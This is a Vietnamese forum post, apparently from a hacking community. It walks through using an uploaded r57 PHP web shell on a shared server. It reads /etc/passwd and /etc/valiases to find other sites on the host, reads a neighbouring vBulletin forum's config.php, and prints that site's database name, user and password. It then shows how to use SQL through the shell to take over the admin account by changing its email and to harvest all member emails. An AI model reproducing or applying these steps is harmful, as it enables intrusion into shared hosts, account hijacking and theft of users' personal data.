Admin

AdminAdmin is verified member.

Well-Known Member
Staff member
Administrator
Giả sử đã up được con r57.php lên host,sau đó
Code:
cat /etc/passwd
và ra được các path của những victim khác trên cùng server:
ex: /home/user1
/home/user2
……………..
vấn đề là làm sao biết được domain của user1 và user2 đây?Tớ đã sử dụng
Code:
cat /var/cpanel/accounting.log
Code:
cat /etc/domains
nhưng đều không thành công
kiểm tra các sites trên cùng server này
Code:
Code:
ls -la /etc/valiases
dùng thêm live hoặc công cụ tìm kiếm để search
live.com ip : ***.***.***.***
Code:
Code:
cd /etc/vdomainaliases && ls -lia
cd /etc/vdomainaliases;ls -lia
cd /etc/valiases && ls -lia
cd /etc/valiases;ls -lia
nó sẽ hiện ra…………………….. dạng như sau
Code:
819980 -rw-r–r– 1 flfounin nobody 0 Mar 17 13:34 fl4938r.com
4821034 -rw-r–r– 1 flanchen nobody 0 Mar 17 13:33 flanche.net
4826219 -rw-r–r– 1 bangings nobody 0 Mar 17 13:35 fonerahacks.bangingscrew.com
4826135 -rw-r–r– 1 bangings nobody 0 Mar 17 13:35 fonerahacks.com
4824052 -rw-r–r– 1 illusio4 nobody 0 Mar 17 13:33 forgehalo-net.illusion-gfx.com
4824049 -rw-r–r– 1 illusio4 nobody 0 Mar 17 13:33 forgehalo.net
4823877 -rw-r–r– 1 forgetbu nobody 0 Mar 17 13:33 forgetbuttons.com
Tiếp tục là local
Trên r57 shell dùng lệnh :
vd: sever nhactre
Code:
ls /home/yeutruct/public_html/nhactre/
Hướng dẫn sử dụng shell r57

tiếp tục dùng lệnh ls vào thư mục 4rum/includes :
Hướng dẫn sử dụng shell r57

Ah ha, file config đây rồi, dùng lệnh cat /home/yeutruct/public_html/nhactre/4rum/includes/c onfig.php để xem nội dung :
Hướng dẫn sử dụng shell r57

Ta có được các thông tin về database :
Code:
$config['Database']['dbname'] = ‘yeutruct_nhactre’;$config['MasterServer']['username'] = ‘yeutruct_nhactre’;$config['MasterServer']['password'] = ‘mekiep’;
Trên r57 >>> Database >>> Run SQL query điền các thông tin tìm được vào :
Hướng dẫn sử dụng shell r57

Nhấn Execute .
Tiếp tục run SQL command :
Hướng dẫn sử dụng shell r57

Ta sẽ có được toàn bộ các tables trong database này, nhưng hiện tại vấn đề ở đây chúng ta chỉ cần những tables quan trọng :
Hướng dẫn sử dụng shell r57

Tới đây là thấy khỏe khoắn rồi, userid = 1 đích thị là admin.
Hướng dẫn sử dụng shell r57

Theo các bạn thì chúng ta sẽ làm tiếp thế nào đây? VBB sử dụng hash MD5 đã qua xử lý (salted hashed) nên ko thể dùng hash MD5 bình thường để thay thế. Vậy làm sao để đổi password của admin đây nhỉ ?
Hihi đành chịu khó mất thêm tí thời gian vậy , đổi password ko ổn thì ta sẽ đổi email :
Hướng dẫn sử dụng shell r57

Sẵn tiện tay dùng thêm câu lệnh SELECT email FROM user để ” thâu tóm ” toàn bộ email thành viên diễn đàn này .
Tiếp tục vào forum của trang nhactre.vn và sử dụng chức năng forgot password >>> kết quả tiếp theo :
Hướng dẫn sử dụng shell r57

Backup Database:
Code:
mysql -u username -p password dbname
> /path/to/dump.sqlRestore Database:
Code:
mysql -u username -p password dbname < /path/to/dump.sql
 
Up.phát.........
 

Facebook Comments

Similar threads

Back
Top